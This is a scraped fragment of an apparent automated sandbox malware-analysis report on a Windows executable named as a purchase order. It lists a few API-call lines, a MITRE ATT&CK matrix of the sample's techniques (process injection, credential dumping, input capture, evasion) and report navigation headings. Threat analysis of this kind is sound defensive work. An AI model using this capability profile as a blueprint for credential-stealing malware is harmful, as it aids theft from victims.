Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DC6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00DC6283
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DC6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00DC6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	31 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 Software Packing	LSA Secrets	261 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	412 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PURCHASE ORDER N0259305-06SN.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
PURCHASE ORDER N0259305-06SN.exe